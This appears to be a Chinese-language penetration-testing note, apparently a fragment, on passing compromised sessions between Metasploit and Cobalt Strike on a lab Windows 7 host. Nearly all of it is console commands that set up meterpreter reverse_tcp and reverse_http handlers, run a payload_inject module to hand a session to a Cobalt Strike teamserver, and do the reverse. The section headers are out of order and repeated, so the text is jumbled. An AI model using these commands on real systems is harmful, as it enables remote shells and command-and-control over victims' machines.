use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.44.128
set LPORT 7777
run
然后运行win7上面的msfcs.exe
获得shell
到CS端 先添加一个Listeners
在MSF端中background后执行下面命令
use exploit/windows/local/payload_inject
set PAYLOAD windows/meterpreter/reverse_http
set DisablePayloadHandler true //MSF已建立监听
set LHOST 192.168.44.128 //teamserver IP
set LPORT 83 //cs监听器中监听的端口
set SESSION 1
exploit
0x02[CS To MSF]
首先上线一个CS 还是前面的WIN7
将生成的exe上传到WIN7并执行,上线一个CS
在MSF中执行下面命令
set payload windows/meterpreter/reverse_http
use exploit/multi/handler
set lhost 192.168.44.128
set lport 6666
run
0x01[MSF To CS]
首先上线一个MSF 我这里是WIN7
0x02[CS To MSF]